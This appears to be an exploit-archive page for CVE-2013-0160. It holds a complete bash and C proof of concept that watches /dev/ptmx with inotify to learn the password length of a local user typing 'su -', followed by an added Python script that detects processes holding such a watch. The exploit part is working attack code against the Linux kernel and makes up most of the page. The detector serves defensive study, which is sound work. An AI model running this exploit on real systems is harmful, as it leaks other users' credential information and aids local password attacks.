Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
Source: http://vladz.devzero.fr  Author: vladz  Published: 2013-02-06

#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determines the password length of a local
# user who runs "su -".  Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information. 
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <vladz@devzero.fr> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

# Refuse to start while an "su" session is already running: the counter
# below only makes sense for a session it watches from the very beginning.
if ps -e -o cmd= | egrep -q "^(-|^)su"; then
  echo "[-] Kill/close all running \"su\" sessions before using this PoC"
  exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

/* Number of IN_MODIFY events seen on /dev/ptmx while "su -" was running. */
static int count = 0;

/* SIGINT handler: the wrapper script sends SIGINT once the password has
 * been accepted.  One event is discounted because the Enter that ends
 * the password is counted like any other keystroke. */
void display_result(int sig) {

  (void)sig;
  printf("[+] password len is %d\n", count-1);
  _exit(0);
}

int main() {

  int fd;
  char buf[1024];

  signal(SIGINT, display_result);

  /* Watch the pty multiplexer for modifications (CVE-2013-0160): the
   * kernel updated its timestamps on every write, so each keystroke
   * typed at the su prompt surfaces as one IN_MODIFY event. */
  fd = inotify_init();
  inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);

  /* One read() returns one event; stop on error or EOF instead of
   * counting a failed read (read() returns -1, which is truthy). */
  while(read(fd, buf, sizeof(buf)) > 0) count++;

  return 0;
}
_EOF_

# Brace expansion: "cc -o $exe $exe.c"
cc -o ${exe}{,.c}

echo "[*] Wait for someone to run \"su -\""

# Poll the process list.  One matching entry ("su -") means a session is
# at the password prompt: start the event counter once.  Two entries mean
# su has spawned the login shell ("-su"), i.e. the password was accepted:
# send SIGINT to the counter so it prints its result, then stop.
while true; do

  ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
  x=$(wc -l ${tmp})

  case ${x% *} in

    1) (( run )) && continue;
       echo -n "[+] su detected, full command: "
       cat ${tmp}; ${exe} &
       (( run = 1 ))  ;;

    2) [ ! -z "$!" ] && kill -2 $!; break ;;

  esac

done

rm -f ${exe}{,.c} ${tmp}
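A detection-side counterpart, added here and not part of vladz's PoC: on kernels that expose inotify marks in /proc/<pid>/fdinfo/<fd> (added in 3.8, so not on the Debian 6 kernel the PoC was tested against), any process holding a watch on /dev/ptmx can be listed by matching the `ino:` and `sdev:` fields of those lines against the device node's inode number and filesystem device. The fdinfo line layout and the kernel dev_t packing (major in bits 20 and up, minor in the low 20 bits) are those of the mainline kernel; the sample fdinfo text, the function names and the IN_MODIFY constant usage are constructed for this example.

```python
#!/usr/bin/env python3
"""List processes that hold an inotify watch on /dev/ptmx.

A process watching the pty multiplexer for IN_MODIFY has no ordinary
reason to exist on most hosts, so surfacing it is a cheap check.  Relies
on the inotify lines the kernel prints in /proc/<pid>/fdinfo/<fd>
(kernel >= 3.8); reading another user's fdinfo needs root/CAP_SYS_PTRACE.
"""
import os
import re

IN_MODIFY = 0x2  # value from <sys/inotify.h>

# One line per watch, e.g.:
# inotify wd:1 ino:5 sdev:6 mask:2 ignored_mask:0 fhandle-bytes:8 ...
FDINFO_RE = re.compile(
    r"^inotify\s+wd:(?P<wd>[0-9a-f]+)\s+ino:(?P<ino>[0-9a-f]+)"
    r"\s+sdev:(?P<sdev>[0-9a-f]+)\s+mask:(?P<mask>[0-9a-f]+)",
    re.MULTILINE,
)

# Constructed sample of one fdinfo file for an inotify descriptor that
# watches two inodes: inode 5 on device 0:6 (a typical devtmpfs /dev/ptmx)
# and an unrelated file (inode 0x1a3) on device 8:1.
SAMPLE_FDINFO = """\
pos:\t0
flags:\t02000000
mnt_id:\t15
inotify wd:1 ino:5 sdev:6 mask:2 ignored_mask:0 fhandle-bytes:8 fhandle-type:1 f_handle:05000000ffffffff
inotify wd:2 ino:1a3 sdev:800001 mask:2 ignored_mask:0 fhandle-bytes:8 fhandle-type:1 f_handle:a3010000ffffffff
"""


def kernel_dev_split(sdev):
    """Split a kernel dev_t (as printed in fdinfo) into (major, minor)."""
    return sdev >> 20, sdev & 0xFFFFF


def watches_on(fdinfo_text, target_ino, target_major, target_minor):
    """Return [(wd, mask), ...] for every watch in one fdinfo text whose
    target is the given inode on the given (major, minor) device."""
    hits = []
    for m in FDINFO_RE.finditer(fdinfo_text):
        ino = int(m.group("ino"), 16)
        major, minor = kernel_dev_split(int(m.group("sdev"), 16))
        if (ino, major, minor) == (target_ino, target_major, target_minor):
            hits.append((int(m.group("wd"), 16), int(m.group("mask"), 16)))
    return hits


def scan_proc(path="/dev/ptmx", proc="/proc"):
    """Walk /proc and return [(pid, comm, fd, [(wd, mask), ...]), ...]
    for every descriptor holding an inotify watch on `path`."""
    st = os.stat(path)
    target = (st.st_ino, os.major(st.st_dev), os.minor(st.st_dev))
    findings = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        fdinfo_dir = os.path.join(proc, pid, "fdinfo")
        try:
            fds = os.listdir(fdinfo_dir)
        except OSError:  # process exited, or not ours and no CAP_SYS_PTRACE
            continue
        for fd in fds:
            try:
                with open(os.path.join(fdinfo_dir, fd)) as f:
                    hits = watches_on(f.read(), *target)
            except OSError:
                continue
            if hits:
                try:
                    with open(os.path.join(proc, pid, "comm")) as f:
                        comm = f.read().strip()
                except OSError:
                    comm = "?"
                findings.append((int(pid), comm, int(fd), hits))
    return findings


if __name__ == "__main__":
    for pid, comm, fd, hits in scan_proc():
        desc = ", ".join(
            "wd %d mask 0x%x%s" % (wd, mask, " (IN_MODIFY)" if mask & IN_MODIFY else "")
            for wd, mask in hits)
        print("pid %d (%s) fd %d watches /dev/ptmx: %s" % (pid, comm, fd, desc))
```

Running the script as root while the PoC above is active lists the counter binary by pid and comm; the same match logic applies unchanged to any other device node (for example a specific /dev/pts/N) by passing its path to scan_proc().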


 